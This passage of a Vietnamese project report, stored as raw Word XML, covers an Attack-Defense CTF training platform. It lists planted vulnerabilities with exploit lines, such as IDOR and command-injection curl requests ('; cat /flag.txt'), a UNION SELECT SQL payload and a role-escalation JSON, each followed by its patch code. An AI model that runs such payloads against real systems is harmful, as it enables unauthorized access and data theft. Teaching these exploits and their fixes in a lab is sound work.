              <w:br/>
              <w:t>for t in threads: t.start()</w:t>
              <w:br/>
              <w:t>for t in threads: t.join()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Giải pháp khắc phục (Vá lỗi): Sử dụng khóa mutex để tuần tự hóa các truy cập thay đổi số dư.</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import threading</w:t>
              <w:br/>
              <w:t>db_lock = threading.Lock()</w:t>
              <w:br/>
              <w:br/>
              <w:t># Trong hàm withdraw():</w:t>
              <w:br/>
              <w:t>with db_lock:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Thực hiện đọc balance, tính toán và ghi đè balance...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.2. Lỗ hổng 2: IDOR (Insecure Direct Object References)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mô tả: API truy vấn tin nhắn riêng tư `/api/message/&lt;msg_id&gt;` cho phép mọi người dùng truy cập trực tiếp các bản ghi tin nhắn của người dùng khác thông qua ID mà không xác thực quyền sở hữu. Bản ghi ID 1 chứa Database Flag của vòng đấu.</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Kịch bản khai thác bằng curl:</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curl -b "session_token=[TOKEN]" http://192.168.29.157:8002/api/message/1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mã nguồn vá lỗi (Defense): Kiểm tra xem người dùng hiện tại có phải sender hoặc receiver của tin nhắn hay không.</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if msg['sender'] != user['username'] and msg['receiver'] != user['username']:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return jsonify({"status": "error", "message": "Unauthorized access"}), 403</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.3. Lỗ hổng 3: SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mô tả: Tính năng tìm kiếm `/search` lấy tham số `q` từ người dùng và nối chuỗi trực tiếp vào truy vấn SQL: `f"SELECT * FROM items WHERE name LIKE '%{query}%'"`. Cho phép kẻ tấn công chèn lệnh trích xuất cơ sở dữ liệu.</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Payload khai thác trích xuất dữ liệu từ bảng private_messages:</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 UNION SELECT 1, message, 3, 4, 5 FROM private_messages --</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mã nguồn vá lỗi (Defense): Sử dụng Parameterized Queries.</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cursor.execute("SELECT * FROM items WHERE name LIKE ?", (f'%{query}%',))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.4. Lỗ hổng 4: Command Injection / RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mô tả: Endpoint `/api/network_check` chạy lệnh hệ thống ping qua `subprocess.check_output(command, shell=True)` mà không thực hiện lọc ký tự đầu vào của tham số `target`, dẫn đến việc kẻ tấn công có thể chèn các ký tự `;`, `&amp;&amp;` để thực thi mã tùy ý.</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Kịch bản khai thác (Attack) đọc tệp flag.txt:</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curl -b "session_token=[TOKEN]" -d "target=127.0.0.1; cat /flag.txt" http://192.168.29.157:8002/api/network_check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mã nguồn vá lỗi (Defense): Sử dụng Regular Expression lọc đầu vào.</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import re</w:t>
              <w:br/>
              <w:t>if not re.match(r"^[a-zA-Z0-9.-]+$", target):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return jsonify({"status": "error", "message": "Invalid character in target!"}), 400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.5. Lỗ hổng 5: Broken Object Level Authorization (BOLA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mô tả: API cập nhật hồ sơ `/api/profile/update` nhận trực tiếp tham số `username` từ payload JSON để cập nhật thông tin mà không đối chiếu với Token người dùng đang đăng nhập. Ngoài ra, API này cho phép thay đổi trường nhạy cảm như `role` và `balance`.</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Payload nâng quyền hạn của tài khoản lên admin:</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curl -X POST -H "Content-Type: application/json" -b "session_token=[TOKEN]" \</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -d '{"username": "my_user", "role": "admin", "balance": 99999}' \</w:t>
              <w:br/>
              <w:t xml:space="preserve">  http://192.168.29.157:8002/api/profile/update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mã nguồn vá lỗi (Defense): Lấy định danh cứng từ Token và chặn nâng quyền.</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username_to_update = user['username']</w:t>
              <w:br/>
              <w:t>if 'role' in data or 'balance' in data:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return jsonify({"status": "error", "message": "Modifying restricted fields is forbidden!"}), 403</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.6. Lỗ hổng 6: Weak Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mô tả: Kiểm tra coupon `/api/coupon/claim` sử dụng thuật toán MD5 yếu và Salt bị lộ tĩnh trong mã nguồn: `md5(username + "WEAK_SALT")`. Cho phép người chơi tự tính toán mã Hash tương ứng với tài khoản để nhận tiền thưởng trái phép.</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Mã nguồn vá lỗi (Defense): Sử dụng thuật toán ký HMAC-SHA256 với Secret Key mạnh.</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import hmac, hashlib</w:t>
              <w:br/>
              <w:t>SECRET_KEY = b"StrongServerSideKey2026!!!"</w:t>
              <w:br/>
              <w:t>expected_hash = hmac.new(SECRET_KEY, user['username'].encode(), hashlib.sha256).hexdigest()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.7. Lỗ hổng 7: Hardcoded Credentials / Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mô tả: Tệp tin cấu hình dự phòng `/static/config.py.bak` nằm ở đường dẫn tĩnh công khai, chứa mật khẩu quản trị mẫu và đặc biệt là chuỗi khóa JWT Secret Key yếu (`VulnServiceDefaultWeakSecretKey`), cho phép kẻ tấn công ký giả mạo Token admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Giải pháp khắc phục: Xóa bỏ tệp tin `.bak` nhạy cảm và sinh ngẫu nhiên JWT Secret Key.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9029"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9029"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D0D0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="264" w:lineRule="auto" w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="2B2B2B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>import os</w:t>
              <w:br/>
              <w:t>JWT_SECRET_KEY = os.urandom(32).hex() # Sinh khóa mạnh ngẫu nhiên khi khởi động</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="160" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 6: ĐÁNH GIÁ VÀ THỬ NGHIỆM HỆ THỐNG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.1. Đánh giá tính bảo mật của chính Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảo mật của Gameserver đóng vai trò then chốt trong việc duy trì tính trung thực của giải đấu. Thông qua việc phân tích kiến trúc an toàn thông tin, hệ thống tự đánh giá đạt được các chỉ tiêu bảo mật cao chống lại các đòn tấn công phổ biến:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQL Injection: Gameserver sử dụng cơ chế Parameterized Queries cho tất cả các câu lệnh SQL tương tác với SQLite DB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Replay Attack: Các flag chỉ có giá trị hiệu lực trong tối đa 2 vòng đấu (vòng hiện tại và vòng liền trước). Thí sinh không thể gửi lại các flag của vòng đấu trước để ghi thêm điểm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Brute-force: Các flag được sinh ra với độ ngẫu nhiên cao (entropy cao) gồm 16 ký tự hexa ngẫu nhiên. Việc dò đoán flag là bất khả thi trong khoảng thời gian ngắn của vòng đấu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Đảm bảo tính cô lập: Sử dụng Bridge Network nội bộ không định tuyến ra Internet cho các cổng giao dịch nhạy cảm (như API cập nhật flag).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.2. Kết quả thử nghiệm thực tế</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hệ thống đã được chạy thực nghiệm giả lập với 2 đội chơi hoạt động trực tiếp. Kết quả ghi nhận:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Động cơ vòng đấu (Game Engine) hoạt động chính xác: Vòng đấu tự động chuyển đổi sau mỗi 120 giây. Các flag mới được tự động sinh và nạp thành công vào database, tệp tin và biến môi trường của các đội.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SLA Checker đánh giá chính xác: Khi dịch vụ hoạt động bình thường, điểm SLA được cộng đều đặn. Khi tắt dịch vụ hoặc vá lỗi gây crash app, hệ thống lập tức báo trạng thái DOWN và thực hiện trừ điểm tương ứng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Quy trình CI/CD Git hoạt động mượt mà: Người chơi push code lên Gitea, Webhook kích hoạt kéo mã nguồn mới về và chạy lệnh docker compose build/up để redeploy lại container chỉ trong vòng 5 - 10 giây mà không gây gián đoạn cho đội chơi khác.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="160" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Đồ án đã nghiên cứu và xây dựng thành công nền tảng thi đấu an toàn thông tin theo mô hình đối kháng Attack-Defense CTF "Chợ Đen Số" gọn nhẹ, hiệu quả và có độ tự động hóa cao. Hệ thống đã giải quyết triệt để các vấn đề về đóng gói môi trường, cô lập mạng an toàn bằng Docker, xây dựng cơ chế deploy tự động mượt mà qua Git Webhooks và cung cấp một kịch bản lỗ hổng thực tế phong phú giúp thí sinh phát triển toàn diện kỹ năng an toàn thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Hướng phát triển tương lai</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Để hệ thống hoàn thiện và ứng dụng rộng rãi hơn, đồ án đề xuất một số hướng nghiên cứu tiếp theo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tích hợp giao diện quản trị trực quan hơn cho ban tổ chức (Web-based Admin Panel toàn diện thay vì sử dụng query parameters).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mở rộng khả năng tự động hóa sinh hạ tầng trên môi trường đám mây (Cloud Orchestration) sử dụng Kubernetes để hỗ trợ số lượng đội chơi lớn (lên tới hàng trăm đội).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bổ sung cơ chế giám sát lưu lượng mạng (Network Traffic PCAP Dump) cho phép người chơi tải về và phân tích các gói tin tấn công của đối thủ, giúp nâng cao kỹ năng điều tra số (Forensics).</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:pgSz w:w="11909" w:h="16834"/>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